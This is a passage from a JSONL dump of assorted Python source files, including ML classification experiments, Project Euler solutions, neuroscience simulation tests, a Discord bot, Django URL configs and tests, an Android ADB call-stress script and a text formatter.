copd_meds, selected_cols_meds, 0.05)\n with open('ttest_results_samples_meds.pickle', 'wb') as f:\n pickle.dump(samples_results_meds, f)\n\n \n# ttest_items = dict.fromkeys(sig_items)\n# for key, value in sig_items.items():\n# print(key)\n# s0 = ''\n# for v in value:\n# s0 += str(d_names_inds[v]) + '%#%'\n# ttest_items[key] = s0\n# ttest_items_list = list(ttest_items.values())\n# ttest_items_df = pd.Series(ttest_items_list)\n# ttest_items_df.to_csv('ttest_items_inds.csv', header=False, index=False)\n \n # =========================Experiment 2: Classification ================================\n # Feature Selection (50% of data) using hypothesis testing ; then Classification using the selected features ==========================\n thres = 0.05\n size = 0.3 \n # generate all 10 sets of data samples for each subpopulation; write to csv\n getSamples_all(chf, dm, ckd, copd)\n \n \n classification_results_ttest = Classification_ttest_all(selected_cols, thres, size)\n for k, v in classification_results_ttest.items():\n print(k + str(' - Avg: '))\n print(v[1])\n print(k + str(' - Std: '))\n print(v[2]) \n\n with open('classification_results_ttest.pickle', 'wb') as f:\n pickle.dump(classification_results_ttest, f)\n\n\n with open('all_proc_cats_dict.pickle', 'rb') as f1:\n proc_cats_all = pickle.load(f1)\n\n \n classification_results_lasso = Classification_lasso_all(selected_cols, thres, size) \n for k, v in classification_results_lasso.items():\n print(k + str(' - Avg: '))\n print(v[0])\n print(k + str(' - Std: '))\n print(v[1])\n \n with open('classification_results_lasso.pickle', 'wb') as f:\n pickle.dump(classification_results_lasso, f)\n \n selected_cols_lasso = dict.fromkeys(selected_cols)\n selected_cols_lasso['chf_vs_dm'] = selected_cols['chf_vs_dm']\n selected_cols_lasso['chf_vs_ckd'] = [\"BISPECTRAL MONITORING\"]\n selected_cols_lasso['chf_vs_copd'] = [\"Antiasthmatic\", \"Macrolide Antibiotics\", \"PULMONARY FUNCTION TESTS ADULT\", \"FLU FLUZONE 0.5ML VL 36MO>\", \"CTA ABDOMEN PELVIS (RADIOLOGIST TO RECOMMEND)\", \"PR EXC SKIN BENIG <5MM REMAINDR BODY\"]\n selected_cols_lasso['dm_vs_ckd'] = [\"Antidiabetic\", \"HEMOGLOBIN A1C\", \"XR CHEST SINGLE VW\", \"CARBOXYHEMOGLOBIN\", \"ANTI-NEUTROPHIL ANTIBODY\"]\n selected_cols_lasso['dm_vs_copd'] = [\"Antidiabetic\", \"Antiasthmatic\", \"HEMOGLOBIN A1C\", \"Macrolide Antibiotics\"]\n selected_cols_lasso['ckd_vs_copd'] = selected_cols['ckd_vs_copd']\n\n classification_results_lasso2 = Classification_lasso_all(selected_cols_lasso, thres, size) \n for k, v in classification_results_lasso2.items():\n print(k + str(' - Avg: '))\n print(v[0])\n print(k + str(' - Std: '))\n print(v[1])\n\n\n \n comparisons_dict, comparisons_df = resultCompare(classification_results_lasso, classification_results_ttest)\n comparisons_df.to_csv('comparison_avg_lasso_ttest.csv', header=True)\n \n # # data transformation using matrix factorization\n # data_spca, pca_components = feature_transform.SparsePCA_transformationV2(data, 50)\n # data_nmf, nmf_components = feature_transform.NMF_transformationV2(data, 50)\n #\n # # split training and testing sets; predictive modeling\n # # results_svm1, results_svm2, results_rf, results_knn1, results_knn2, results_ada = prediction_experiments(data, response, 'Raw Data')\n #\n # spca_results_svm1, spca_results_svm2, spca_results_rf, spca_results_knn1, spca_results_knn2, spca_results_ada = prediction_experiments(data_spca, response, 'SPCA-transformed data')\n #\n # nmf_results_svm1, nmf_results_svm2, nmf_results_rf, nmf_results_knn1, nmf_results_knn2, nmf_results_ada = prediction_experiments(data_nmf, response, 'NMF-transformed data')\n\n # In[204]: len(test_items['chf_vs_dm'])\n # Out[204]: 267\n # In[205]: len(test_items['chf_vs_ckd'])\n # Out[205]: 1030\n # In[206]: len(test_items['chf_vs_copd'])\n # Out[206]: 245\n # In[207]: len(test_items['dm_vs_ckd'])\n # Out[207]: 964\n # In[208]: len(test_items['dm_vs_copd'])\n # Out[208]: 129\n # In[209]: len(test_items['ckd_vs_copd'])\n # Out[209]: 922\n\n\n with open('ttest_results.pickle', 'rb') as f:\n test_results = pickle.load(f)\n\n with open('ttest_results_samples.pickle', 'rb') as f:\n samples_results = pickle.load(f)\n\n\n # with open('selected_features_ttest.pickle', 'wb') as f:\n # pickle.dump(test_items, f)\n #\n # with open('selected_features_ttest.pickle', 'rb') as f:\n # test_items = pickle.load(f)\n\n","sub_path":"Classification_Experiments.py","file_name":"Classification_Experiments.py","file_ext":"py","file_size_in_byte":22657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"188831684","text":"import time\r\none_to_nin = [\"one\",\"two\",\"three\",\"four\",\"five\",\"six\",\"seven\",\"eight\",\"nine\",\"ten\",\r\n \"eleven\",\"twelve\",\"thirteen\",\"fourteen\",\"fifteen\",\"sixteen\",\"seventeen\",\r\n \"eighteen\",\"nineteen\"]\r\ntens = [\"twenty\",\"thirty\",\"forty\",\"fifty\",\"sixty\",\"seventy\",\"eighty\",\"ninety\"]\r\na = \"and\" ; h = \"hundred\"\r\n\r\ndef letters_of_num(i):\r\n ans = 0\r\n if (len(str(i)) == 2):\r\n un = int(i%10) ; dec = int(i/10)\r\n if (un == 0):\r\n ans = len(tens[dec-2])\r\n else:\r\n ans = (len(tens[dec-2]) + len(one_to_nin[un-1]))\r\n else:\r\n hun = int(i/100) ; res = int(i%100)\r\n if (res == 0):\r\n ans = (len(one_to_nin[hun-1]) + len(h))\r\n elif (res>=1) and (res<=19) :\r\n ans = (len(one_to_nin[hun-1]) + len(h) + len(a) + len(one_to_nin[res-1]))\r\n else:\r\n dec = int(res/10) ; un = int(res%10)\r\n if(un != 0):\r\n ans = (len(one_to_nin[hun-1]) + len(h) + len(a) + len(tens[dec-2]) + len(one_to_nin[un-1]))\r\n else:\r\n ans = (len(one_to_nin[hun-1]) + len(h) + len(a) + len(tens[dec-2]))\r\n return ans\r\n \r\nstart = time.time() ; N = 1000 ; ans = 0 \r\nans += sum([len(x) for x in one_to_nin])\r\nfor i in range(20,N):\r\n ans += letters_of_num(i)\r\nprint(ans+len('onethousand'),time.time()-start,\"seconds\")\r\n \r\n ","sub_path":"Pr17.py","file_name":"Pr17.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"355137923","text":"negative = \"Invalid Input\" \n\ndef lcm(l ,r):\n LCM = max([l,r])\n\n while 1:\n if LCM % l ==0 and LCM % r == 0:\n return LCM\n LCM +=1\n\ntry:\n l, r = list(map(int, input().split()))\n print(lcm(l,r))\nexcept:\n print(negative)\n","sub_path":"player/settwo/landr.py","file_name":"landr.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"121337062","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\ndef swap_nodes(head, i, j):\n counti=0\n countj=0\n curr=head\n prev=None\n if(iI and countj>J:\n break\n if counti==I:\n ihead=curr\n if(curr.next is not None):\n iheadnext=curr.next\n else:\n iheadnext=None\n iprev=prev\n if countj==J:\n jhead=curr\n if(jhead.next is not None):\n jheadnext=jhead.next\n else:\n jheadnext=None\n jprev=prev\n counti+=1\n countj+=1\n prev=curr\n curr=curr.next\n if ihead == jprev:\n if iprev is not None:\n iprev.next=jhead\n jhead.next=ihead\n ihead.next=jheadnext\n return head\n else:\n jhead.next=ihead\n ihead.next=jheadnext\n return jhead\n if iprev is None:\n jprev.next=ihead\n jhead.next=iheadnext\n ihead.next=jheadnext\n return jhead\n iprev.next=jhead\n jprev.next=ihead\n \n jhead.next=iheadnext\n ihead.next=jheadnext\n return head\n \n #############################\n # PLEASE ADD YOUR CODE HERE #\n #############################\n pass\n\ndef ll(arr):\n if len(arr)==0:\n return None\n head = Node(arr[0])\n last = head\n for data in arr[1:]:\n last.next = Node(data)\n last = last.next\n return head\n\ndef printll(head):\n while head:\n print(head.data, end=' ')\n head = head.next\n print()\n\n# Main\n# Read the link list elements including -1\narr=list(int(i) for i in input().strip().split(' '))\n# Create a Linked list after removing -1 from list\nl = ll(arr[:-1])\ni, j=list(int(i) for i in input().strip().split(' '))\nl = swap_nodes(l, i, j)\nprintll(l)\n\n","sub_path":"Linked List -2/swap two node (LL) .py","file_name":"swap two node (LL) .py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"530177007","text":"import os.path as op\n\nfrom numpy import loadtxt\nfrom numpy.testing import assert_array_equal, assert_allclose, assert_raises\n\nfrom mne.utils import _fetch_file\nimport hnn_core\nfrom hnn_core import simulate_dipole, Network, read_params\nfrom hnn_core import MPIBackend, JoblibBackend\n\n\ndef run_hnn_core(backend=None, n_jobs=1):\n \"\"\"Test to check if hnn-core does not break.\"\"\"\n # small snippet of data on data branch for now. To be deleted\n # later. Data branch should have only commit so it does not\n # pollute the history.\n data_url = ('https://raw.githubusercontent.com/jonescompneurolab/'\n 'hnn-core/test_data/dpl.txt')\n if not op.exists('dpl.txt'):\n _fetch_file(data_url, 'dpl.txt')\n dpl_master = loadtxt('dpl.txt')\n\n hnn_core_root = op.dirname(hnn_core.__file__)\n\n # default params\n params_fname = op.join(hnn_core_root, 'param', 'default.json')\n params = read_params(params_fname)\n params_reduced = params.copy()\n params_reduced.update({'N_pyr_x': 3,\n 'N_pyr_y': 3,\n 'tstop': 25,\n 't_evprox_1': 5,\n 't_evdist_1': 10,\n 't_evprox_2': 20,\n 'N_trials': 2})\n\n # run the simulation on full model (1 trial) and a reduced model (2 trials)\n net = Network(params)\n net_reduced = Network(params_reduced)\n\n if backend == 'mpi':\n with MPIBackend(n_procs=2, mpi_cmd='mpiexec'):\n dpl = simulate_dipole(net)[0]\n dpls_reduced = simulate_dipole(net_reduced)\n elif backend == 'joblib':\n with JoblibBackend(n_jobs=n_jobs):\n dpl = simulate_dipole(net)[0]\n dpls_reduced = simulate_dipole(net_reduced)\n else:\n dpl = simulate_dipole(net)[0]\n dpls_reduced = simulate_dipole(net_reduced)\n\n # write the dipole to a file and compare\n fname = './dpl2.txt'\n dpl.write(fname)\n\n dpl_pr = loadtxt(fname)\n assert_array_equal(dpl_pr[:, 2], dpl_master[:, 2]) # L2\n assert_array_equal(dpl_pr[:, 3], dpl_master[:, 3]) # L5\n\n # Test spike type counts\n spiketype_counts = {}\n for spikegid in net.spikes.gids[0]:\n if net.gid_to_type(spikegid) not in spiketype_counts:\n spiketype_counts[net.gid_to_type(spikegid)] = 0\n else:\n spiketype_counts[net.gid_to_type(spikegid)] += 1\n assert 'common' not in spiketype_counts\n assert 'exgauss' not in spiketype_counts\n assert 'extpois' not in spiketype_counts\n assert spiketype_counts == {'evprox1': 269,\n 'L2_basket': 54,\n 'L2_pyramidal': 113,\n 'L5_pyramidal': 395,\n 'L5_basket': 85,\n 'evdist1': 234,\n 'evprox2': 269}\n return dpls_reduced\n\n\ndef test_compare_across_backends():\n \"\"\"Test that trials are generated consistently across parallel backends.\"\"\"\n\n # test consistency between default backend simulation and master\n dpls_reduced_default = run_hnn_core(None)\n\n # test consistency between mpi backend simulation (n_procs=2) and master\n dpls_reduced_mpi = run_hnn_core(backend='mpi')\n\n # test consistency between joblib backend simulation (n_jobs=2) with master\n dpls_reduced_joblib = run_hnn_core(backend='joblib', n_jobs=2)\n\n # test consistency across all parallel backends for multiple trials\n assert_raises(AssertionError, assert_array_equal,\n dpls_reduced_default[0].data['agg'],\n dpls_reduced_default[1].data['agg'])\n\n for trial_idx in range(len(dpls_reduced_default)):\n # account for rounding error incured during MPI parallelization\n assert_allclose(dpls_reduced_default[trial_idx].data['agg'],\n dpls_reduced_mpi[trial_idx].data['agg'], rtol=0,\n atol=1e-14)\n assert_array_equal(dpls_reduced_default[trial_idx].data['agg'],\n dpls_reduced_joblib[trial_idx].data['agg'])\n","sub_path":"hnn_core/tests/test_compare_hnn.py","file_name":"test_compare_hnn.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"8661604","text":"'''\n The sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\n\n Find the sum of all the primes not greater than given N.\n\n Input Format\n\n The first line contains an integer T i.e. number of the test cases. \n The next T lines will contains an integer N.\n\n Constraints\n\n 1 <= T <= 10^4\n 1 <= N <= 10^6\n\n Output Format\n\n Print the value corresponding to each test case in separate line.\n\n Algorithm 4: Here we use sieve of rwh1\n'''\n\nfrom timeit import default_timer as timer\n\ndef sumOfPrimes(number):\n sum = 2\n number = number + 1\n primes = [True] * (number // 2)\n limit = int(number ** 0.5) + 1\n\n for i in range(3, limit, 2):\n if primes[i//2]:\n primes[i*i//2::i] = [False]*((number - i*i - 1)//(2*i) + 1)\n \n for i in range(1, number // 2):\n if primes[i]:\n sum += (2 * i + 1)\n\n return sum\n\nif __name__ == '__main__':\n number = int(input('Enter then number :: '))\n start = timer()\n print('Sum of primes not greater than {} is {}'.format(number, sumOfPrimes(number)))\n end = timer()\n print('Time taken is : {}'.format(end - start))\n","sub_path":"general-practice/24_08_2019/p7.py","file_name":"p7.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"241758119","text":"'''\n\n'''\n\nimport json\nimport logging\nimport traceback\nimport asyncio\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING, Optional, List, Dict, Union\n\nimport asyncpg\nimport discord\nfrom discord.ext import commands\n\nimport db\n\n\n\nfrom bot import GGBot\n\n\nlogging.basicConfig(level=logging.INFO, format=\"[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s\")\n\nbot = GGBot(command_prefix=\"t;\",\n max_messages=100000,\n # description=\"A simple logging bot that ignores PluralKit proxies.\\n\",\n owner_id=389590659335716867,\n case_insensitive=True)\n\n\n@bot.event\nasync def on_ready():\n logging.info('Connected using discord.py version {}!'.format(discord.__version__))\n logging.info('Username: {0.name}, ID: {0.id}'.format(bot.user))\n logging.info(\"Connected to {} servers.\".format(len(bot.guilds)))\n logging.info('------')\n\n logging.warning(\"Stalk Market is fully loaded.\")\n\n\n# ---- Command Error Handling ----- #\n@bot.event\nasync def on_command_error(ctx, error):\n\n # https://gist.github.com/EvieePy/7822af90858ef65012ea500bcecf1612\n # This prevents any commands with local handlers being handled here in on_command_error.\n if hasattr(ctx.command, 'on_error'):\n return\n\n if type(error) == discord.ext.commands.NoPrivateMessage:\n await ctx.send(\"⚠ This command can not be used in DMs!!!\")\n return\n elif type(error) == discord.ext.commands.CommandNotFound:\n await ctx.send(\"⚠ Invalid Command!!!\")\n return\n elif type(error) == discord.ext.commands.MissingPermissions:\n await ctx.send(\"⚠ You need the **Manage Messages** permission to use this command\".format(error.missing_perms))\n return\n elif type(error) == discord.ext.commands.MissingRequiredArgument:\n await ctx.send(\"⚠ {}\".format(error))\n elif type(error) == discord.ext.commands.BadArgument:\n await ctx.send(\"⚠ {}\".format(error))\n elif isinstance(error, commands.CommandOnCooldown):\n await ctx.send(\"⚠ {}\".format(error))\n else:\n # await ctx.send(\"⚠ {}\".format(error))\n raise error\n\n\n@bot.event\nasync def on_error(event_name, *args):\n logging.exception(\"Exception from event {}\".format(event_name))\n\n if 'error_log_channel' not in bot.config:\n return\n\n error_log_channel = bot.get_channel(bot.config['error_log_channel'])\n\n embed = None\n # Determine if we can get more info, otherwise post without embed\n if args and type(args[0]) == discord.Message:\n message: discord.Message = args[0]\n # embeds.exception_w_message(message)\n elif args and type(args[0]) == discord.RawMessageUpdateEvent:\n logging.error(\"After Content:{}.\".format(args[0].data['content']))\n if args[0].cached_message is not None:\n logging.error(\"Before Content:{}.\".format(args[0].cached_message.content))\n # Todo: Add more\n\n traceback_message = \"```python\\n{}```\".format(traceback.format_exc())\n traceback_message = (traceback_message[:1993] + ' ...```') if len(traceback_message) > 2000 else traceback_message\n await error_log_channel.send(content=traceback_message, embed=embed)\n\n\nif __name__ == '__main__':\n\n with open('config.json') as json_data_file:\n config = json.load(json_data_file)\n\n db_pool: asyncpg.pool.Pool = asyncio.get_event_loop().run_until_complete(db.create_db_pool(config['db_uri']))\n asyncio.get_event_loop().run_until_complete(db.create_tables(db_pool))\n\n bot.config = config\n bot.db_pool = db_pool\n bot.command_prefix = config['bot_prefix']\n\n bot.load_cogs()\n bot.run(config['token'])\n\n logging.info(\"cleaning Up and shutting down\")\n","sub_path":"src/startStalkMarket.py","file_name":"startStalkMarket.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"233792900","text":"from django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.views import defaults as default_views\nfrom django.views.generic import TemplateView\n\nfrom gkdsite.views import *\nfrom django_messages.views import *\n# from gkdsite.views import MyListView\n# from django_markdown.views import *\n\n\"\"\"\n... EXAMPLES ...\n Function views:\n ---------------\n 1) Add an import -> from myApp import views\n 2) Add URL to urlpatterns-> url(r'^$', views.home, name='home')\n\n Class-based views:\n ------------------\n 1) Add an import -> from otherApp.views import Home\n 2) Add URL to urlpatterns-> url(r'^$', Home.as_view(), name='home')\n\n Including another URLConf:\n --------------------------\n 1) Add an import -> from blog import urls as blog_urls\n 2) Import the include() func-> from django.conf.urls import include, url\n 3) Add URL to urlpatterns-> url(r'^blog/$', include(blog_urls)) \n\"\"\"\nurlpatterns = [\n url(r\"^$\", TemplateView.as_view(template_name=\"homepage.html\"), name=\"home\"),\n url(r\"^admin/\", include(admin.site.urls)),\n url(r\"^account/\", include(\"account.urls\")),\n\n # https://github.com/codingforentrepreneurs/Guides/blob/master/all/common_url_regex.md\n url(r'^events/', include(\"events.urls\", namespace='events')),\n # url(r'^profile/(?P[\\w.@+-]+)/$', user_profile, name='profile'),\n\n # User management\n url(r'^mylang/', mylang, name='user_language'),\n\n # Messages\n url(r\"^messages/\", include(\"django_messages.urls\", namespace=\"messages\")),\n url(r'^inbox/$', inbox, name='messages_inbox'),\n url(r'^outbox/$', outbox, name='messages_outbox'),\n url(r'^compose/$', compose, name='messages_compose'),\n url(r'^compose/(?P[\\w.@+-]+)/$', compose, name='messages_compose_to'),\n url(r'^reply/(?P[\\d]+)/$', reply, name='messages_reply'),\n url(r'^view/(?P[\\d]+)/$', view, name='messages_detail'),\n url(r'^delete/(?P[\\d]+)/$', delete, name='messages_delete'),\n url(r'^undelete/(?P[\\d]+)/$', undelete, name='messages_undelete'),\n url(r'^trash/$', trash, name='messages_trash'),\n url(r\"^notifications/\", include(\"pinax.notifications.urls\")),\n\n # Other stuff\n url(r\"^blog/\", include(\"pinax.blog.urls\", namespace=\"pinax_blog\")),\n url(r'^markdown/', include(\"django_markdown.urls\")),\n]\n\nif settings.DEBUG:\n # * Don't serve static content in production! *\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n # This allows the error pages to be debugged during development, just visit\n # these url in browser to see how these error pages look like.\n urlpatterns += [\n url(r'^400/$', default_views.bad_request, kwargs={'exception': Exception('Bad Request!')}),\n url(r'^403/$', default_views.permission_denied, kwargs={'exception': Exception('Permission Denied')}),\n url(r'^404/$', default_views.page_not_found, kwargs={'exception': Exception('Page not Found')}),\n url(r'^500/$', default_views.server_error),\n ]\n if 'rosetta' in settings.INSTALLED_APPS:\n urlpatterns += [\n url(r'^rosetta/', include('rosetta.urls')),\n ]\n","sub_path":"gkdsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"74705630","text":"import os\nimport time\nfrom sys import argv\nIterations=argv[1]\npasscnt = 0\nfailcnt = 0\ndef sim_test():\n os.system(\"adb shell getprop >gsm.txt \")\n with open(\"gsm.txt\",\"r+\") as fh:\n lines=fh.readlines()\n for line in lines:\n string1=\"[gsm.sim.state]: [READY,READY]\"\n string2 = \"[gsm.sim.state]: [READY,NOT_READY]\"\n string3 = \"[gsm.sim.state]: [NOT_READY,READY]\"\n string4 = \"[gsm.sim.state]: [ABSENT,READY]\"\n string5 = \"[gsm.sim.state]: [READY,ABSENT]\"\n if (string1 in line or string2 in line or string3 in line or string4 in line or string5 in line):\n print(\"Sim present, so procedding the test\")\n return(True)\n else:\n return(False)\ndef Validate():\n os.system( \"adb shell dumpsys telephony.registry > mCallState.txt\")\n time.sleep(5)\n with open(\"mCallState.txt\",\"r+\") as fh:\n lines=fh.readlines()\n for line in lines:\n string1=\"mCallState=2\"\n if(string1 in line):\n print(\"Call already connected and in progress...\\n\")\n return(True)\n return(False) \ndef KillGmMusic():\n os.system(\"adb shell am force-stop com.generalmobile.app.musicplayer\") \ndef LaunchGmMusic():\n os.system(\"adb shell monkey -p com.generalmobile.app.musicplayer -c android.intent.category.LAUNCHER 1\")\n time.sleep(2) \n \nfor i in range(int(Iterations)):\n if(sim_test()):\n if(Validate()):\n print(\"Ending the call \\n\")\n os.system(\"adb shell input keyevent KEYCODE_ENDCALL\")\n else:\n print(\"No call is in progress...\")\n print(\"Connecting the call to MT_num...\\n\")\n os.system(\"adb shell am start -a android.intent.action.CALL -d tel:9100071290\")\n time.sleep(3)\n KillGmMusic()\n LaunchGmMusic()\n os.system(\"adb shell input tap 536 1290\")\n if(Validate()):\n print(\"Call successfully connected and in progress...\")\n passcnt+=1\n time.sleep(2)\n print(\"Ending the call \\n\")\n os.system(\"adb shell input keyevent KEYCODE_ENDCALL\")\n print(\"Call successfully disconnected ...\")\n else:\n failcnt+=1\n time.sleep(5)\n KillGmMusic() \n else:\n print(\"SIM not present...unable to make a call...\")\n failcnt+=1 \nprint(\"Pass count,Fail count: \",passcnt,failcnt)\n \n \n\n\n \n","sub_path":"ADB Scripts/GMLAB Scripts/stress_stability/MOcall_audio.py","file_name":"MOcall_audio.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"137094441","text":"import random\n\nfrom django.test import TestCase\nfrom django.utils import timezone\n\nfrom promotions.models import Stage, Lesson\nfrom skills.models import Skill, StudentSkill\nfrom stats.StatsObject import LeastMasteredSkill, MostMasteredSkill\nfrom users.models import User, Student\n\n\nclass TestLeastSkillAcquired(TestCase):\n def setUp(self):\n number_of_student = 100\n number_of_skills = 100\n\n students_list = []\n students_list2 = []\n skills_list = []\n\n stage = Stage.objects.create(name=\"stage\", short_name=\"s\", level=1)\n stage_no_student_acquired_skills = Stage.objects.create(name=\"stage_nas\", short_name=\"snas\", level=1)\n stage_no_student_acquired_skills.save()\n stage.save()\n\n lesson = Lesson.objects.create(name=\"lesson\", stage=stage)\n lesson_no_acquired_skill = Lesson.objects.create(name=\"lesson2\", stage=stage_no_student_acquired_skills)\n lesson2 = Lesson.objects.create(name=\"lesson2\", stage=stage)\n lesson.save()\n lesson_no_acquired_skill.save()\n lesson2.save()\n\n for i in range(0, number_of_student):\n user = User.objects.create(username=\"username\" + str(i))\n user2 = User.objects.create(username=\"usernameV2\" + str(i))\n student = Student.objects.create(user=user)\n student2 = Student.objects.create(user=user2)\n student.save()\n student2.save()\n lesson.students.add(student)\n lesson2.students.add(student2)\n students_list.append(student)\n students_list2.append(student2)\n\n for i in range(0, number_of_skills):\n gen_name = \"skill\" + str(i)\n gen_name2 = gen_name + \"v2\"\n skill = Skill.objects.create(code=gen_name, name=gen_name)\n skill2 = Skill.objects.create(code=gen_name2, name=gen_name2)\n skill.save()\n skill2.save()\n stage.skills.add(skill)\n stage_no_student_acquired_skills.skills.add(skill2)\n skills_list.append(skill)\n\n random.seed()\n\n max_skill, skill_obj_max = None, None\n min_skill, skill_obj_min = None, None\n\n max_skill2, skill_obj_max2 = None, None\n min_skill2, skill_obj_min2 = None, None\n\n for skill in skills_list:\n count, count2 = 0, 0\n for student in students_list:\n if random.randint(0, 1) == 1:\n skill_student = StudentSkill.objects.create(student=student, skill=skill, acquired=timezone.now())\n skill_student.save()\n count += 1\n for student in students_list2:\n if random.randint(0, 1) == 1:\n skill_student = StudentSkill.objects.create(student=student, skill=skill, acquired=timezone.now())\n skill_student.save()\n count2 += 1\n\n if max_skill is None or count > max_skill:\n max_skill = count\n skill_obj_max = skill\n if min_skill is None or count < min_skill:\n min_skill = count\n skill_obj_min = skill\n\n if max_skill2 is None or count2 > max_skill2:\n max_skill2 = count2\n skill_obj_max2 = skill\n if min_skill2 is None or count2 < min_skill2:\n min_skill2 = count2\n skill_obj_min2 = skill\n\n self.expected_min_skill = skill_obj_min\n self.expected_max_skill = skill_obj_max\n\n self.expected_min_skill_lesson2 = skill_obj_min2\n self.expected_max_skill_lesson2 = skill_obj_max2\n\n self.lesson = lesson\n self.lesson2 = lesson2\n self.lesson_no_acquired_skill = lesson_no_acquired_skill\n\n def test_least_skill_acquired(self):\n least_lesson1 = LeastMasteredSkill(self.lesson).data\n least_lesson2 = LeastMasteredSkill(self.lesson2).data\n self.assertEquals(least_lesson1, self.expected_min_skill)\n self.assertEquals(least_lesson2, self.expected_min_skill_lesson2)\n\n def test_most_skill_acquired(self):\n most_lesson1 = MostMasteredSkill(self.lesson).data\n most_lesson2 = MostMasteredSkill(self.lesson2).data\n self.assertEquals(most_lesson1, self.expected_max_skill)\n self.assertEquals(most_lesson2, self.expected_max_skill_lesson2)\n\n def test_when_no_skill_is_acquired_in_stage(self):\n most_none = MostMasteredSkill(self.lesson_no_acquired_skill).data\n least_none = LeastMasteredSkill(self.lesson_no_acquired_skill).data\n self.assertEquals(most_none, None)\n self.assertEquals(least_none, None)\n","sub_path":"stats/tests/testLeastMostAcquiredSkill.py","file_name":"testLeastMostAcquiredSkill.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"115177768","text":"import random\r\nimport plotly.express as px\r\nimport plotly.figure_factory as ff\r\ncount = []\r\nsum = []\r\nfor i in range(0,100):\r\n dice1 = random.randint(1,6)\r\n dice2 = random.randint(1,6)\r\n sum.append(dice1+dice2)\r\n count.append(i)\r\nfig = ff.create_distplot([sum],[\"result\"])\r\nfig.show()\r\n","sub_path":"109.py","file_name":"109.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"514495697","text":"import argparse\nimport sys\n\npunction_marks = [',', '.', '?', '!', '-', ':', '\\'']\n\n\ndef is_punction_mark(character):\n for mark in punction_marks:\n if character == mark:\n return True\n return False\n\n\ndef stream_read(stream):\n # При считывании сразу разобьем текст на абзацы\n s = []\n paragraph = \"\"\n for line in stream:\n line = line.strip()\n if line == '':\n if paragraph == '':\n continue\n s.append(paragraph)\n paragraph = \"\"\n else:\n paragraph += ' ' + line\n s.append(paragraph)\n return s\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\")\n parser.add_argument(\"-o\", \"--output\")\n parser.add_argument(\"-l\", \"--line-length\", type=int, default=0)\n parser.add_argument(\"-p\", \"--paragraph-spaces\", type=int, default=0)\n args = parser.parse_args()\n if args.paragraph_spaces < 0 or args.line_length < 0:\n raise \"Invalid arguments\"\n return args\n\n\ndef main():\n # Парсим аргументы командной строки\n args = parse_arguments()\n\n # Читаем текст\n if args.input:\n try:\n paragraphs = stream_read(open(args.input))\n except IOError:\n print(\"IOError\")\n sys.exit(1)\n else:\n paragraphs = stream_read(sys.stdin)\n\n answer = []\n for par in paragraphs:\n # Ставим пробелы вокруг знаков препинания\n for mark in punction_marks:\n par = par.replace(mark, ' ' + mark + ' ')\n\n # Разделяем текст на куски без пробелов\n words = par.split()\n\n word_with_punction_marks = \"\"\n previous_word = \"\"\n new_list_of_words = []\n num_spaces = args.paragraph_spaces\n for word in words:\n # К первому слову в каждом абзаце добавляем пробелы\n if previous_word == \"\":\n for i in range(0, num_spaces):\n previous_word += \" \"\n previous_word += word\n word_with_punction_marks = previous_word\n continue\n # Присоединяем знаки препинания к словам слева от них\n if (not (is_punction_mark(word)) and\n is_punction_mark(previous_word)):\n new_list_of_words.append(word_with_punction_marks)\n word_with_punction_marks = word\n elif (is_punction_mark(word) and is_punction_mark(previous_word)):\n word_with_punction_marks += word\n elif (is_punction_mark(word) and not\n (is_punction_mark(previous_word))):\n word_with_punction_marks += word\n else:\n new_list_of_words.append(previous_word)\n word_with_punction_marks = word\n previous_word = word\n new_list_of_words.append(word_with_punction_marks)\n\n words = new_list_of_words\n max_line_length = args.line_length\n result = \"\"\n # Соединяем слова в абзац\n for word in words:\n if len(word) > max_line_length:\n raise \"Too long word\"\n if len(result) + len(word) + 1 <= max_line_length:\n if result == \"\":\n result = word\n else:\n result += \" \" + word\n else:\n answer.append(result)\n result = word\n answer.append(result)\n\n # Соединяем абзацы переносами строк\n answer = '\\n'.join(answer)\n\n if args.output:\n try:\n out = open(args.output, \"w\")\n out.write(answer)\n except IOError:\n print(\"IOError\")\n sys.exit(1)\n else:\n sys.stdout.write(answer)\n\nif __name__ == 'main':\n main()\n","sub_path":"Форматирование_текста.py","file_name":"Форматирование_текста.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"293749243","text":"#!/Users/xg203/opt/anaconda3/bin/python\nimport sys\nimport 